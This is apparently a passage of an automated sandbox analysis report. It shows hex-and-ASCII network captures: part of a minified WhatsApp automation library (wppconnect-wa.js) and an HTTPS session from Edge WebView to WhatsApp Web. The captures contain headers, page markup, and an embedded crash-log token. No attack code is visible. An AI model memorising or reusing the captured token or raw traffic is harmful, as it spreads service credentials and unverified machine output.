74 28 72 2b 32 29 5d 3e 3e 32 2c 63 5b 6c 2b 2b 5d 3d 74 3e 3e 38 26 32 35 35 2c 63 5b 6c 2b 2b 5d 3d 32 35 35 26 74 29 2c 63 7d 2c 74 2e 66 72 6f 6d 42 79 74 65 41 72 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 65 2e 6c 65 6e 67 74 68 2c 6f 3d 6e 25 33 2c 69 3d 5b 5d 2c 73 3d 31 36 33 38 33 2c 61 3d 30 2c 63 3d 6e 2d 6f 3b 61 3c 63 3b 61 2b 3d 73 29 69 2e 70 75 73 68 28 75 28 65 2c 61 2c 61 2b 73 3e 63 3f 63 3a 61 2b 73 29 29 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 3f 28 74 3d 65 5b 6e 2d 31 5d 2c 69 2e 70 75 73 68 28 72 5b 74 3e 3e 32 5d 2b 72 5b 74 3c 3c 34 26 36 33 5d 2b 22 3d 3d 22 29 29 3a 32 3d 3d 3d 6f 26 26 28 74 3d 28 65 5b 6e 2d 32 5d 3c 3c 38 29 2b 65 5b
                                                                                                                                                                                                                Data Ascii: /*! For license information please see wppconnect-wa.js.LICENSE.txt */!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.WPP=t():e.WPP=t()}(self,(()=>(()=>{var __webpack_modules__={79742:(e,t)=>{"use strict";t.byteLength=function(e){var t=a(e),r=t[0],n=t[1];return 3*(r+n)/4-n},t.toByteArray=function(e){var t,r,i=a(e),s=i[0],u=i[1],c=new o(function(e,t,r){return 3*(t+r)/4-r}(0,s,u)),l=0,d=u>0?s-4:s;for(r=0;r<d;r+=4)t=n[e.charCodeAt(r)]<<18|n[e.charCodeAt(r+1)]<<12|n[e.charCodeAt(r+2)]<<6|n[e.charCodeAt(r+3)],c[l++]=t>>16&255,c[l++]=t>>8&255,c[l++]=255&t;return 2===u&&(t=n[e.charCodeAt(r)]<<2|n[e.charCodeAt(r+1)]>>4,c[l++]=255&t),1===u&&(t=n[e.charCodeAt(r)]<<10|n[e.charCodeAt(r+1)]<<4|n[e.charCodeAt(r+2)]>>2,c[l++]=t>>8&255,c[l++]=255&t),c},t.fromByteArray=function(e){for(var t,n=e.length,o=n%3,i=[],s=16383,a=0,c=n-o;a<c;a+=s)i.push(u(e,a,a+s>c?c:a+s));return 1===o?(t=e[n-1],i.push(r[t>>2]+r[t<<4&63]+"==")):2===o&&(t=(e[n-2]<<8)+e[
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.804452896 CET1286INData Raw: 6e 2d 31 5d 2c 69 2e 70 75 73 68 28 72 5b 74 3e 3e 31 30 5d 2b 72 5b 74 3e 3e 34 26 36 33 5d 2b 72 5b 74 3c 3c 32 26 36 33 5d 2b 22 3d 22 29 29 2c 69 2e 6a 6f 69 6e 28 22 22 29 7d 3b 66 6f 72 28 76 61 72 20 72 3d 5b 5d 2c 6e 3d 5b 5d 2c 6f 3d 22
                                                                                                                                                                                                                Data Ascii: n-1],i.push(r[t>>10]+r[t>>4&63]+r[t<<2&63]+"=")),i.join("")};for(var r=[],n=[],o="undefined"!=typeof Uint8Array?Uint8Array:Array,i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",s=0;s<64;++s)r[s]=i[s],n[i.charCodeAt(s)]=s;f
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.804491043 CET1286INData Raw: 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 55 6e 6b 6e 6f 77 6e 20 65 6e 63 6f 64 69 6e 67 3a 20 22 2b 74 29 3b 63 6f 6e 73 74 20 72 3d 30 7c 6d 28 65 2c 74 29 3b 6c 65 74 20 6e 3d 61 28 72 29 3b 63 6f 6e 73 74 20 6f
                                                                                                                                                                                                                Data Ascii: t))throw new TypeError("Unknown encoding: "+t);const r=0|m(e,t);let n=a(r);const o=n.write(e,t);return o!==r&&(n=n.slice(0,o)),n}(e,t);if(ArrayBuffer.isView(e))return function(e){if(H(e,Uint8Array)){const t=new Uint8Array(e);return p(t.buffer,
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.804513931 CET1286INData Raw: 2c 20 41 72 72 61 79 42 75 66 66 65 72 2c 20 41 72 72 61 79 2c 20 6f 72 20 41 72 72 61 79 2d 6c 69 6b 65 20 4f 62 6a 65 63 74 2e 20 52 65 63 65 69 76 65 64 20 74 79 70 65 20 22 2b 74 79 70 65 6f 66 20 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65
                                                                                                                                                                                                                Data Ascii: , ArrayBuffer, Array, or Array-like Object. Received type "+typeof e)}function l(e){if("number"!=typeof e)throw new TypeError('"size" argument must be of type number');if(e<0)throw new RangeError('The value "'+e+'" is invalid for option "size"
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.990041018 CET1286INData Raw: 66 2d 38 22 3a 72 65 74 75 72 6e 20 24 28 65 29 2e 6c 65 6e 67 74 68 3b 63 61 73 65 22 75 63 73 32 22 3a 63 61 73 65 22 75 63 73 2d 32 22 3a 63 61 73 65 22 75 74 66 31 36 6c 65 22 3a 63 61 73 65 22 75 74 66 2d 31 36 6c 65 22 3a 72 65 74 75 72 6e
                                                                                                                                                                                                                Data Ascii: f-8":return $(e).length;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return 2*r;case"hex":return r>>>1;case"base64":return K(e).length;default:if(o)return n?-1:$(e).length;t=(""+t).toLowerCase(),o=!0}}function y(e,t,r){let n=!1;if((void
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.990185022 CET1286INData Raw: 6c 61 73 74 49 6e 64 65 78 4f 66 2e 63 61 6c 6c 28 65 2c 74 2c 72 29 3a 76 28 65 2c 5b 74 5d 2c 72 2c 6e 2c 6f 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 76 61 6c 20 6d 75 73 74 20 62 65 20 73 74 72 69 6e 67 2c 20 6e 75
                                                                                                                                                                                                                Data Ascii: lastIndexOf.call(e,t,r):v(e,[t],r,n,o);throw new TypeError("val must be string, number or Buffer")}function v(e,t,r,n,o){let i,s=1,a=e.length,u=t.length;if(void 0!==n&&("ucs2"===(n=String(n).toLowerCase())||"ucs-2"===n||"utf16le"===n||"utf-16l
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.990226030 CET1286INData Raw: 79 28 65 29 3a 6e 2e 66 72 6f 6d 42 79 74 65 41 72 72 61 79 28 65 2e 73 6c 69 63 65 28 74 2c 72 29 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 65 2c 74 2c 72 29 7b 72 3d 4d 61 74 68 2e 6d 69 6e 28 65 2e 6c 65 6e 67 74 68 2c 72 29 3b 63 6f 6e 73 74 20
                                                                                                                                                                                                                Data Ascii: y(e):n.fromByteArray(e.slice(t,r))}function S(e,t,r){r=Math.min(e.length,r);const n=[];let o=t;for(;o<r;){const t=e[o];let i=null,s=t>239?4:t>223?3:t>191?2:1;if(o+s<=r){let r,n,a,u;switch(s){case 1:t<128&&(i=t);break;case 2:r=e[o+1],128==(192&
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.990309954 CET1286INData Raw: 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 75 2e 70 72 6f 74 6f 74 79 70 65 2c 22 70 61 72 65 6e 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 2e 69 73 42 75 66 66 65 72 28 74
                                                                                                                                                                                                                Data Ascii: .defineProperty(u.prototype,"parent",{enumerable:!0,get:function(){if(u.isBuffer(this))return this.buffer}}),Object.defineProperty(u.prototype,"offset",{enumerable:!0,get:function(){if(u.isBuffer(this))return this.byteOffset}}),u.poolSize=8192
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.990381002 CET1286INData Raw: 31 7d 7d 2c 75 2e 63 6f 6e 63 61 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 22 6c 69 73 74 22 20 61 72 67 75 6d 65
                                                                                                                                                                                                                Data Ascii: 1}},u.concat=function(e,t){if(!Array.isArray(e))throw new TypeError('"list" argument must be an Array of Buffers');if(0===e.length)return u.alloc(0);let r;if(void 0===t)for(t=0,r=0;r<e.length;++r)t+=e[r].length;const n=u.allocUnsafe(t);let o=0
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.990417957 CET1286INData Raw: 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 3d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 75 2e 69 73 42 75 66 66 65 72 28
                                                                                                                                                                                                                Data Ascii: toLocaleString=u.prototype.toString,u.prototype.equals=function(e){if(!u.isBuffer(e))throw new TypeError("Argument must be a Buffer");return this===e||0===u.compare(this,e)},u.prototype.inspect=function(){let e="";const r=t.h2;return e=this.to
                                                                                                                                                                                                                Mar 10, 2024 17:46:00.990453959 CET1286INData Raw: 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 74 3d 30 3b 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 3d 3d 3d 72 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 6e 3d 74 2c 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 74 3d 30 3b 65 6c 73
                                                                                                                                                                                                                Data Ascii: r=this.length,t=0;else if(void 0===r&&"string"==typeof t)n=t,r=this.length,t=0;else{if(!isFinite(t))throw new Error("Buffer.write(string, encoding, offset[, length]) is no longer supported");t>>>=0,isFinite(r)?(r>>>=0,void 0===n&&(n="utf8")):(


                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                0192.168.2.44974631.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC714OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: web.whatsapp.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1996INHTTP/1.1 200 OK
                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                Vary: Accept-Encoding, User-Agent, Accept-Language
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"
                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                                                                                                                                                cross-origin-opener-policy: unsafe-none;report-to="coop_report"
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1767INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 3b 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 62 6c 6f 62 3a 3b 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 77 68 61 74 73 61 70 70 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 3b 73 74 79 6c 65 2d 73 72 63
                                                                                                                                                                                                                Data Ascii: content-security-policy: frame-ancestors 'self';content-security-policy: default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 6f 63 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 57 68 61 74 73 41 70 70 20 57 65 62 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e
                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class="no-js" dir="ltr" loc="en-GB"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>WhatsApp Web</title><meta name="viewport" content="width=device-width"><meta name="google" content="n
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 37 2c 20 32 33 39 2c 20 30 2e 38 38 29 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 6c 69 67 68 74 65 72 3a 23 36 36 37 37 38 31 3b 2d 2d 70 72 6f 67 72 65 73 73 2d 70 72 69 6d 61 72 79 3a 23 30 62 38 34 36 64 3b 2d 2d 70 72 6f 67 72 65 73 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 33 33 31 33 38 7d 23 61 70 70 2c 62 6f 64 79 2c 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 23 61 70 70 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 7d 23 69 6e 69 74 69 61 6c 5f 73 74 61 72 74 75 70 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 64 69
                                                                                                                                                                                                                Data Ascii: 7, 239, 0.88);--secondary-lighter:#667781;--progress-primary:#0b846d;--progress-background:#233138}#app,body,html{width:100%;height:100%;padding:0;margin:0;overflow:hidden}#app{position:absolute;top:0;left:0}#initial_startup{position:fixed;top:0;left:0;di
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 6c 69 67 68 74 65 72 29 7d 23 69 6e 69 74 69 61 6c 5f 73 74 61 72 74 75 70 20 2e 73 65 63 6f 6e 64 61 72 79 20 73 70 61 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 70 72 6f 67 72 65 73 73 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 33 70 78 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 6f 67 72 65 73 73 2d 70 72 69 6d 61 72 79 29 3b
                                                                                                                                                                                                                Data Ascii: 12px;font-size:14px;color:var(--secondary-lighter)}#initial_startup .secondary span{display:inline-block;margin-bottom:2px;vertical-align:middle}progress{-webkit-appearance:none;appearance:none;width:100%;height:3px;margin:0;color:var(--progress-primary);
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 2d 34 2e 34 2d 32 2e 31 2d 2e 36 2d 2e 32 2d 31 2d 2e 34 2d 31 2e 34 2e 33 6c 2d 32 20 32 2e 35 63 2d 2e 34 2e 34 2d 2e 38 2e 35 2d 31 2e 35 2e 32 2d 2e 36 2d 2e 33 2d 32 2e 37 2d 31 2d 35 2e 31 2d 33 2e 32 2d 32 2d 31 2e 37 2d 33 2e 32 2d 33 2e 38 2d 33 2e 36 2d 34 2e 35 2d 2e 34 2d 2e 36 20 30 2d 31 20 2e 33 2d 31 2e 33 6c 31 2d 31 2e 31 2e 36 2d 31 2e 31 63 2e 32 2d 2e 34 20 30 2d 2e 38 20 30 2d 31 2e 31 6c 2d 32 2d 34 2e 38 63 2d 2e 36 2d 31 2e 33 2d 31 2e 31 2d 31 2d 31 2e 35 2d 31 2e 31 68 2d 31 2e 32 63 2d 2e 35 20 30 2d 31 2e 32 2e 31 2d 31 2e 38 2e 38 2d 2e 35 2e 36 2d 32 2e 32 20 32 2e 32 2d 32 2e 32 20 35 2e 33 20 30 20 33 2e 32 20 32 2e 33 20 36 2e 33 20 32 2e 36 20 36 2e 37 2e 33 2e 34 20 34 2e 36 20 37 20 31 31 20 39 2e 37 6c 33 2e 37 20 31
                                                                                                                                                                                                                Data Ascii: -4.4-2.1-.6-.2-1-.4-1.4.3l-2 2.5c-.4.4-.8.5-1.5.2-.6-.3-2.7-1-5.1-3.2-2-1.7-3.2-3.8-3.6-4.5-.4-.6 0-1 .3-1.3l1-1.1.6-1.1c.2-.4 0-.8 0-1.1l-2-4.8c-.6-1.3-1.1-1-1.5-1.1h-1.2c-.5 0-1.2.1-1.8.8-.5.6-2.2 2.2-2.2 5.3 0 3.2 2.3 6.3 2.6 6.7.3.4 4.6 7 11 9.7l3.7 1
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1029INData Raw: 38 35 32 34 62 30 31 22 3e 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 34 20 57 68 61 74 73 41 70 70 20 49 6e 63 2e 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 77 68 61 74 73 61 70 70 5f 77 65 62 5f 63 6c 69 65 6e 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 77 68 61 74 73 61 70 70 5f 77 65 62 5f 63 6c 69 65 6e 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 36 31 37 5d 2c 7b 33 30 37 39 31 34 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 7d 2c 35 39 35 33 31 38 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74
                                                                                                                                                                                                                Data Ascii: 8524b01">/*! Copyright (c) 2024 WhatsApp Inc. All Rights Reserved. */(self.webpackChunkwhatsapp_web_client=self.webpackChunkwhatsapp_web_client||[]).push([[5617],{307914:e=>{e.exports=function(e){return e&&e.__esModule?e:{default:e}}},595318:e=>{e.export
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 2f 63 72 61 73 68 6c 6f 67 73 2e 77 68 61 74 73 61 70 70 2e 6e 65 74 2f 77 61 5f 66 6c 73 5f 75 70 6c 6f 61 64 5f 63 68 65 63 6b 22 2c 74 2e 43 4c 42 5f 54 4f 4b 45 4e 3d 22 31 30 36 33 31 32 37 37 35 37 31 31 33 33 39 39 7c 37 34 35 31 34 36 66 66 61 33 34 34 31 33 66 39 64 62 62 35 34 36 39 66 35 33 37 30 62 37 61 66 22 2c 74 2e 43 4c 42 5f 55 52 4c 3d 22 68 74 74 70 73 3a 2f 2f 63 72 61 73 68 6c 6f 67 73 2e 77 68 61 74 73 61 70 70 2e 6e 65 74 2f 77 61 5f 63 6c 62 5f 64 61 74 61 22 3b 63 6f 6e 73 74 20 6f 3d 6e 2e 44 59 4e 5f 4f 52 49 47 49 4e 2b 22 77 65 62 2d 63 6f 6e 74 61 63 74 2d 75 73 22 3b 74 2e 54 49 43 4b 45 54 5f 55 52 4c 3d 6f 2c 74 2e 55 4e 49 51 55 45 5f 55 50 4c 4f 41 44 53 5f 41 4c 4c 4f 57 45 44 5f 42 45 46 4f 52 45 5f 54 48 52 4f 54 54
                                                                                                                                                                                                                Data Ascii: /crashlogs.whatsapp.net/wa_fls_upload_check",t.CLB_TOKEN="1063127757113399|745146ffa34413f9dbb5469f5370b7af",t.CLB_URL="https://crashlogs.whatsapp.net/wa_clb_data";const o=n.DYN_ORIGIN+"web-contact-us";t.TICKET_URL=o,t.UNIQUE_UPLOADS_ALLOWED_BEFORE_THROTT
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 6f 72 3a 74 2c 72 65 61 73 6f 6e 3a 72 2c 73 74 61 63 6b 3a 6e 7d 3d 65 3b 63 6f 6e 73 74 20 6f 3d 28 6e 65 77 20 44 61 74 65 29 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 60 24 7b 6f 7d 3a 20 65 72 72 6f 72 3a 20 24 7b 74 7d 5c 6e 24 7b 6f 7d 3a 20 72 65 61 73 6f 6e 20 66 6f 72 20 6c 6f 67 73 3a 20 24 7b 72 7d 5c 6e 24 7b 6f 7d 3a 20 75 73 65 72 41 67 65 6e 74 3a 20 24 7b 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 7d 5c 6e 24 7b 6e 7d 60 7d 6e 75 6c 6c 3d 3d 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 26 26 28 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 63 6f 6e 73 74 20 6e 3d 74 2e 73 70 6c 69 74 28 22 3f 22 29 5b 30 5d 3b 72 65 74 75 72 6e 22 55 6e 63
                                                                                                                                                                                                                Data Ascii: or:t,reason:r,stack:n}=e;const o=(new Date).toISOString();return`${o}: error: ${t}\n${o}: reason for logs: ${r}\n${o}: userAgent: ${window.navigator.userAgent}\n${n}`}null==window.onerror&&(window.onerror=function(e,t,r){const n=t.split("?")[0];return"Unc
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC1500INData Raw: 43 4f 4e 44 41 52 59 3d 74 2e 56 45 52 53 49 4f 4e 5f 50 52 49 4d 41 52 59 3d 74 2e 56 45 52 53 49 4f 4e 5f 42 41 53 45 3d 74 2e 55 53 45 52 5f 54 49 4d 49 4e 47 53 3d 74 2e 55 4e 4b 4e 4f 57 4e 5f 49 44 3d 74 2e 4c 4f 43 41 4c 48 4f 53 54 5f 45 4e 56 5f 43 4f 4e 46 49 47 3d 74 2e 48 41 53 48 5f 50 4c 41 43 45 48 4f 4c 44 45 52 3d 74 2e 46 4c 42 5f 50 4c 41 54 46 4f 52 4d 3d 74 2e 46 42 5f 41 50 50 5f 49 44 3d 74 2e 44 59 4e 5f 4f 52 49 47 49 4e 3d 74 2e 44 49 46 46 5f 56 45 52 53 49 4f 4e 3d 74 2e 44 49 46 46 5f 49 44 3d 74 2e 42 55 49 4c 44 5f 55 52 4c 3d 74 2e 42 55 49 4c 44 5f 54 49 4d 45 53 54 41 4d 50 3d 74 2e 42 55 49 4c 44 5f 49 44 3d 76 6f 69 64 20 30 3b 74 2e 44 49 46 46 5f 49 44 3d 22 22 3b 74 2e 44 49 46 46 5f 56 45 52 53 49 4f 4e 3d 22 22 2c
                                                                                                                                                                                                                Data Ascii: CONDARY=t.VERSION_PRIMARY=t.VERSION_BASE=t.USER_TIMINGS=t.UNKNOWN_ID=t.LOCALHOST_ENV_CONFIG=t.HASH_PLACEHOLDER=t.FLB_PLATFORM=t.FB_APP_ID=t.DYN_ORIGIN=t.DIFF_VERSION=t.DIFF_ID=t.BUILD_URL=t.BUILD_TIMESTAMP=t.BUILD_ID=void 0;t.DIFF_ID="";t.DIFF_VERSION="",
                                                                                                                                                                                                                2024-03-10 16:46:06 UTC171INData Raw: 72 65 6e 63 79 2d 6d 61 6e 69 66 65 73 74 27 3b 73 63 72 69 70 74 2e 74 79 70 65 20 3d 20 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 27 3b 73 63 72 69 70 74 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 63 6f 64 65 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 28 73 63 72 69 70 74 29 3b 7d 29 3b 7d 29 28 27 62 69 6e 61 72 79 2d 74 72 61 6e 73 70 61 72 65 6e 63 79 2d 6d 61 6e 69 66 65 73 74 2d 70 72 65 6c 6f 61 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                Data Ascii: rency-manifest';script.type = 'application/json';script.innerHTML = code;document.body.append(script);});})('binary-transparency-manifest-preload');</script></body></html>


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
